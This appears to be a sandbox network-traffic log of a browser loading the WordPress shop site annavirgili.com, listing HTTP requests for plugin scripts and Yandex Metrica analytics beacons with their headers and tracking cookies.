        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver=0.4.2 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/slider/js/html_types/slider.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /watch/99162160?wmode=7&page-url=https%3A%2F%2Fannavirgili.com%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22131%22%2C%22Chromium%22%3Bv%3D%22131%22%2C%22Not_A%20Brand%22%3Bv%3D%2224%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A131.0.6778.109%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22131.0.6778.109%22%2C%22Chromium%22%3Bv%3D%22131.0.6778.109%22%2C%22Not_A%20Brand%22%3Bv%3D%2224.0.0.0%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A15.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1541%3Acn%3A1%3Adp%3A0%3Als%3A248137426931%3Ahid%3A282929742%3Az%3A-300%3Ai%3A20241212065836%3Aet%3A1734004717%3Ac%3A1%3Arn%3A299573137%3Arqn%3A1%3Au%3A1734004717472745876%3Aw%3A1263x889%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A19099%3Awv%3A2%3Ads%3A630%2C1783%2C494%2C664%2C31%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1734004675978%3Agi%3AR0ExLjEuNTI4NjM2NDI5LjE3MzQwMDQ3MDc%3D%3Arqnl%3A1%3Ast%3A1734004718%3At%3AAnna%20Virgili&t=gdpr(14)clc(0-0-0)rqnt(1)aw(1)rcm(1)cdl(na)eco(42009088)fid(660)ti(1) HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Origin: https://annavirgili.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/price-slider.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/pixel-caffeine/build/frontend.js?ver=2.3.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/slider.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touch-punch.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver=0.4.2 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fannavirgili.com%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22131%22%2C%22Chromium%22%3Bv%3D%22131%22%2C%22Not_A%20Brand%22%3Bv%3D%2224%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A131.0.6778.109%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22131.0.6778.109%22%2C%22Chromium%22%3Bv%3D%22131.0.6778.109%22%2C%22Not_A%20Brand%22%3Bv%3D%2224.0.0.0%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A15.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1541%3Acn%3A1%3Adp%3A0%3Als%3A248137426931%3Ahid%3A282929742%3Az%3A-300%3Ai%3A20241212065836%3Aet%3A1734004717%3Ac%3A1%3Arn%3A299573137%3Arqn%3A1%3Au%3A1734004717472745876%3Aw%3A1263x889%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A19099%3Awv%3A2%3Ads%3A630%2C1783%2C494%2C664%2C31%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1734004675978%3Agi%3AR0ExLjEuNTI4NjM2NDI5LjE3MzQwMDQ3MDc%3D%3Arqnl%3A1%3Ast%3A1734004718%3At%3AAnna%20Virgili&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29fid%28660%29ti%281%29&redirnss=1 HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Origin: https://annavirgili.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; receive-cookie-deprecation=1; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/price-slider.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/pixel-caffeine/build/frontend.js?ver=2.3.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
